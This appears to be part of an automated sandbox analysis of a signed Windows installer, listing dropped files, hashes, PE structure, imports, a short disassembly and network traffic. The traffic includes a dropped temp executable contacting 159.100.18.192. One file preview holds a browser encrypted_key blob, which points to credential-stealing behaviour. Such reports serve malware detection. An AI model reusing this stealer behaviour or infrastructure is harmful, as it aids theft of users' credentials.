                                                                                                                                                                      SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):928256
                                                                                                                                                                      Entropy (8bit):6.558092096809165
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:IEW7F7IyaHx/fempu2e6Z5WODYsHh6g3P0zAk7o:e7IyaBfempa6Z5WODYsHh6g3P0zAk7
                                                                                                                                                                      MD5:6D4ADF9A48DBCE2E480EF10B1338CA3C
                                                                                                                                                                      SHA1:CEB77D5768C6EDA84EC8E0B43821B8027764DE81
                                                                                                                                                                      SHA-256:4CCA7E6C05B2D988926E4B4D0C8FF91D6356F18DE8BF40B440251180E5CAD6A7
                                                                                                                                                                      SHA-512:106DB7309B40AFABB1CCA911B204C83129683DC116AEC198568C4228C581BF0DE5963BFFC0B50DF8F43EC355264F271FC383F4155BE45350C0D7DD429C7F7F09
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                      Entropy (8bit):5.719859767584478
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                      MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                      SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                      SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                      SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:7-zip archive data, version 0.4
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64468182
                                                                                                                                                                      Entropy (8bit):7.999994985636421
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1572864:Njdd/VTld+qlxzJ3LXkQ/eCsYlATxy5YUtrxWL:1/xldB/zJ7P/bsFTxy5YUtrQL
                                                                                                                                                                      MD5:46D98564861CD93E91D370DD44FB782B
                                                                                                                                                                      SHA1:E1F7E73BA879395E82934C2BB03673ADEBC1D81C
                                                                                                                                                                      SHA-256:655BC61EE7C8277433C3C90F8B56D57D5244856755A40845701B81F77719EA56
                                                                                                                                                                      SHA-512:801AC8BC0659D3388B79EB246B21C508F0A6DBE96F25C915E16613DC235989EE8D9035227B653EC57D7234DCC5916FA53488EAA0175AAE2B77DC83F77A5CEB1D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):434176
                                                                                                                                                                      Entropy (8bit):6.584811966667578
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:aUWQQ5O3fz0NG3ucDaEUTWfk+ZA0NrCL/k+uyoyBOX1okfW7w+Pfzqibckl:an5QEG39fPAkrE4yrBOXDfaNbck
                                                                                                                                                                      MD5:80E44CE4895304C6A3A831310FBF8CD0
                                                                                                                                                                      SHA1:36BD49AE21C460BE5753A904B4501F1ABCA53508
                                                                                                                                                                      SHA-256:B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
                                                                                                                                                                      SHA-512:C8BA7B1F9113EAD23E993E74A48C4427AE3562C1F6D9910B2BBE6806C9107CF7D94BC7D204613E4743D0CD869E00DAFD4FB54AAD1E8ADB69C553F3B9E5BC64DF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):389
                                                                                                                                                                      Entropy (8bit):5.622621949828896
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:YKWSg99rrt+f70OAzkP/tXiPLVayaHWRnGX1:YKWfrrtozAzgSPLVayaHW5A
                                                                                                                                                                      MD5:C5A13312836B5591B4FDD0F18FB17873
                                                                                                                                                                      SHA1:E103F6BD20DA9F30C4064F55F1AF9B5192B815BD
                                                                                                                                                                      SHA-256:09BD2149BA8A503349FE7C29BF664B2490DF1706CAF4520626C6CE6FF99A6D7E
                                                                                                                                                                      SHA-512:FAAD5ABB6C8ACA08B78A18D327EC8D9D56AC97F2A539E7B391A56BCFB48E74261D38EDB3A049547CDCD670105DF213C24612282B758E110B685C757138447C8E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb5qmeJUkGQpm40V/wrURqAAAAAAIAAAAAABBmAAAAAQAAIAAAAG4UhC6U9tNd/7wzsqZcS9KdclPCVP+u+KfkZq5Bk+jFAAAAAA6AAAAAAgAAIAAAABDTCZOv5pa4Jw+idLlPRpLEwRzjWEjhnE2Ko9wq4h1KMAAAAIJwcrBuRt0GuFCKX3iuIKe9oA8HHFs7v9sl24eRV2Wkint5h4TmB5ooO++HXhsH2EAAAAAJdLq76rmCsd60NIL0OvC8g5EXqL1u546TvG3kCd/4PfO1pwIqU33MhLZKZcCs6Y8f0L2m8ZnjDXf578P1XHVl"}}
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                      Entropy (8bit):7.999986475754448
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:AyqwnIUrcz.exe
                                                                                                                                                                      File size:64'824'672 bytes
                                                                                                                                                                      MD5:1e047b85b671cc99d941c13865f069db
                                                                                                                                                                      SHA1:7e23e9ffbdfd30537546385e5cd475f58b06e7ae
                                                                                                                                                                      SHA256:d8ae7fbb8db3b027a832be6f1acc44c7f5aebfdcb306cd297f7c30f1594d9c45
                                                                                                                                                                      SHA512:bcf450b9fb274698a174424511ff6cb8dc4a656e0d0cbe8dd15084cc253d07dc8a6d65169d86a0f9e11dede8f89b7031241cf7b5dfc3b9d92e7bc2dc123e327a
                                                                                                                                                                      SSDEEP:1572864:Fjdd/VTld+qlxzJ3LXkQ/eCsYlATxy5YUtrxWNA:9/xldB/zJ7P/bsFTxy5YUtrQNA
                                                                                                                                                                      TLSH:4FE733BE958C38DAD24BFFF15092E2F8C2E4682717D8856017C6161F71F3A911DEA632
                                                                                                                                                                      Icon Hash:072b9152b6f16913
                                                                                                                                                                      Entrypoint:0x40338f
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x5C157F86 [Sat Dec 15 22:26:14 2018 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:4
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                      Signature Valid:true
                                                                                                                                                                      Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                                                                      Error Number:0
                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                      • 03/12/2024 04:22:54 30/08/2025 08:25:00
                                                                                                                                                                      Subject Chain
                                                                                                                                                                      • OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=ConsolHQ LTD, SERIALNUMBER=12800651, O=ConsolHQ LTD, L=Erith, C=GB
                                                                                                                                                                      Version:3
                                                                                                                                                                      Thumbprint MD5:AE4739734663D1493610E29B49A5FD6A
                                                                                                                                                                      Thumbprint SHA-1:07728484B1BB8702A87C6E5A154E0D690AF2FF38
                                                                                                                                                                      Thumbprint SHA-256:DA16DE049B8D8C0C1BE2A4AE6B31629AD9530FD1CF1FEF83EEE59F32C6457DF6
                                                                                                                                                                      Serial:30D6C83A715BDDB32E7956FE52D6B352
                                                                                                                                                                      Instruction
                                                                                                                                                                      sub esp, 000002D4h
                                                                                                                                                                      push ebx
                                                                                                                                                                      push esi
                                                                                                                                                                      push edi
                                                                                                                                                                      push 00000020h
                                                                                                                                                                      pop edi
                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                      push 00008001h
                                                                                                                                                                      mov dword ptr [esp+14h], ebx
                                                                                                                                                                      mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                      call dword ptr [004080A8h]
                                                                                                                                                                      call dword ptr [004080A4h]
                                                                                                                                                                      and eax, BFFFFFFFh
                                                                                                                                                                      cmp ax, 00000006h
                                                                                                                                                                      mov dword ptr [0047AEECh], eax
                                                                                                                                                                      je 00007FFBF4506FA3h
                                                                                                                                                                      push ebx
                                                                                                                                                                      call 00007FFBF450A255h
                                                                                                                                                                      cmp eax, ebx
                                                                                                                                                                      je 00007FFBF4506F99h
                                                                                                                                                                      push 00000C00h
                                                                                                                                                                      call eax
                                                                                                                                                                      mov esi, 004082B0h
                                                                                                                                                                      push esi
                                                                                                                                                                      call 00007FFBF450A1CFh
                                                                                                                                                                      push esi
                                                                                                                                                                      call dword ptr [00408150h]
                                                                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                      cmp byte ptr [esi], 00000000h
                                                                                                                                                                      jne 00007FFBF4506F7Ch
                                                                                                                                                                      push 0000000Ah
                                                                                                                                                                      call 00007FFBF450A228h
                                                                                                                                                                      push 00000008h
                                                                                                                                                                      call 00007FFBF450A221h
                                                                                                                                                                      push 00000006h
                                                                                                                                                                      mov dword ptr [0047AEE4h], eax
                                                                                                                                                                      call 00007FFBF450A215h
                                                                                                                                                                      cmp eax, ebx
                                                                                                                                                                      je 00007FFBF4506FA1h
                                                                                                                                                                      push 0000001Eh
                                                                                                                                                                      call eax
                                                                                                                                                                      test eax, eax
                                                                                                                                                                      je 00007FFBF4506F99h
                                                                                                                                                                      or byte ptr [0047AEEFh], 00000040h
                                                                                                                                                                      push ebp
                                                                                                                                                                      call dword ptr [00408044h]
                                                                                                                                                                      push ebx
                                                                                                                                                                      call dword ptr [004082A0h]
                                                                                                                                                                      mov dword ptr [0047AFB8h], eax
                                                                                                                                                                      push ebx
                                                                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                                                                      push 000002B4h
                                                                                                                                                                      push eax
                                                                                                                                                                      push ebx
                                                                                                                                                                      push 00440208h
                                                                                                                                                                      call dword ptr [00408188h]
                                                                                                                                                                      push 0040A2C8h
                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10b000 | 0x2ca0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3dcff28 | 0x2638 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6627 | 0x6800 | 7618d4c0cd8bb67ea9595b4266b3a91f | False | 0.6646259014423077 | data | 6.450282348506287 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a2 | 0x1600 | eecac1fed9cc6b447d50940d178404d8 | False | 0.4405184659090909 | data | 5.025178929113415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x70ff8 | 0x600 | db8f31a08a2242d80c29e1f9500c6527 | False | 0.5182291666666666 | data | 4.037117731448378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7b000 | 0x90000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x10b000 | 0x2ca0 | 0x2e00 | ef641b158db5997934c553d65bc16d31 | False | 0.8669327445652174 | data | 7.41349647251161 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10b1d8 | 0x22d1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9978682822843038
RT_DIALOG | 0x10d4b0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x10d5b0 | 0xf8 | data | English | United States | 0.6330645161290323
RT_DIALOG | 0x10d6a8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x10d708 | 0x14 | data | English | United States | 1.05
RT_VERSION | 0x10d720 | 0x240 | data | English | United States | 0.5017361111111112
RT_MANIFEST | 0x10d960 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                      Dec 13, 2024 14:47:01.380351067 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.380403042 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.380410910 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.387177944 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.387227058 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.387245893 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.427547932 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.427587032 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.547815084 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.547883987 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.547924042 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.553867102 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.553924084 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.553941011 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567367077 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567413092 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567461967 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.567488909 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.567555904 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.569108009 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:01.569307089 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.569346905 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:01.569389105 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:02.393925905 CET49771443192.168.2.7172.217.19.228
                                                                                                                                                                      Dec 13, 2024 14:47:02.393959045 CET44349771172.217.19.228192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.280419111 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.280462027 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:15.280519009 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.281048059 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:15.281059980 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.087255955 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.087299109 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.087431908 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.088417053 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.088430882 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.496361017 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.513087034 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.513108015 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.514288902 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.514394999 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517282963 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517364025 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.517754078 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.517760992 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.676961899 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.926920891 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.927006006 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:16.927082062 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.927891970 CET49807443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:16.927911043 CET44349807172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.304563999 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.361824036 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.361839056 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363035917 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363049030 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.363118887 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.376578093 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.376714945 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.377310038 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.377319098 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.473807096 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.578713894 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:17.578836918 CET44349812172.64.41.3192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:17.578980923 CET49812443192.168.2.7172.64.41.3
                                                                                                                                                                      Dec 13, 2024 14:47:41.502110958 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.623476028 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:41.624752045 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.625247002 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:41.745034933 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893603086 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893758059 CET8049867159.100.18.192192.168.2.7
                                                                                                                                                                      Dec 13, 2024 14:47:42.893863916 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:42.900346994 CET4986780192.168.2.7159.100.18.192
                                                                                                                                                                      Dec 13, 2024 14:47:43.020098925 CET8049867159.100.18.192192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 14:46:58.451510906 CET | 56124 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 14:46:58.589478016 CET | 53 | 56124 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 14:47:15.101226091 CET | 56379 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 14:47:15.101682901 CET | 50334 | 53 | 192.168.2.7 | 1.1.1.1
Dec 13, 2024 14:47:15.238285065 CET | 53 | 56379 | 1.1.1.1 | 192.168.2.7
Dec 13, 2024 14:47:15.239532948 CET | 53 | 50334 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 14:46:58.451510906 CET | 192.168.2.7 | 1.1.1.1 | 0xf8fd | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 14:47:15.101226091 CET | 192.168.2.7 | 1.1.1.1 | 0x6cf6 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false
Dec 13, 2024 14:47:15.101682901 CET | 192.168.2.7 | 1.1.1.1 | 0x2d58 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 14:46:58.589478016 CET | 1.1.1.1 | 192.168.2.7 | 0xf8fd | No error (0) | www.google.com | | 172.217.19.228 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 14:47:15.238285065 CET | 1.1.1.1 | 192.168.2.7 | 0x6cf6 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 14:47:15.238285065 CET | 1.1.1.1 | 192.168.2.7 | 0x6cf6 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 13, 2024 14:47:15.239532948 CET | 1.1.1.1 | 192.168.2.7 | 0x2d58 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false

                                                                                                                                                                      • www.google.com
                                                                                                                                                                      • chrome.cloudflare-dns.com
                                                                                                                                                                      • 159.100.18.192
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49867 | 159.100.18.192 | 80 | 1964 | C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe

Timestamp | Bytes transferred | Direction | Data
